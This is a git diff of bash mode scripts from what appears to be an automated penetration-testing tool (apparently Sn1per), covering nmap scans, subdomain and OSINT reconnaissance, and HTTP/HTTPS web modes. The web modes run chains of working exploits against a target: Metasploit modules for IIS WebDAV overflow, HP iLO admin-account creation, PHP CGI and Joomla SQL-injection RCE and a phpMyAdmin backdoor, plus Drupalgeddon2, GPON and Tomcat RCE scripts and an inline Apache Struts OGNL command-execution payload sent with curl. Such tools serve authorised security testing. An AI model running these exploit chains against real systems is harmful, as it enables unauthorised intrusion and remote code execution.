echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
||||
if [ "$MODE" = "port" ]; then
|
||||
if [ -z "$PORT" ]; then
|
||||
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
741
modes/normal.sh
741
modes/normal.sh
File diff suppressed because it is too large
Load Diff
|
|
@ -0,0 +1,136 @@
|
|||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 3 -s y -v y
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET --batch --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url http://$TARGET/wordpress/ --batch --disable-tls-checks
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $CMSMAP -t http://$TARGET
|
||||
echo ""
|
||||
python $CMSMAP -t http://$TARGET/wordpress/
|
||||
echo ""
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET
|
||||
fi
|
||||
|
|
@ -0,0 +1,139 @@
|
|||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET -l 3 -s y -v y
|
||||
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET --batch --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --batch --disable-tls-checks
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $CMSMAP -t https://$TARGET
|
||||
echo ""
|
||||
python $CMSMAP -t https://$TARGET/wordpress/
|
||||
echo ""
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; setg SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET
|
||||
|
||||
fi
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
if [ "$OSINT" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING OSINT INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python2.7 $THEHARVESTER -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt
|
||||
fi
|
||||
|
|
@ -0,0 +1,95 @@
|
|||
if [ "$RECON" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whois $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$SUBLIST3R" = "1" ]; then
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$AMASS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
|
||||
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
|
||||
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
|
||||
fi
|
||||
if [ "$SUBFINDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo ""
|
||||
if [ "$CRTSH" = "1" ]; then
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
|
||||
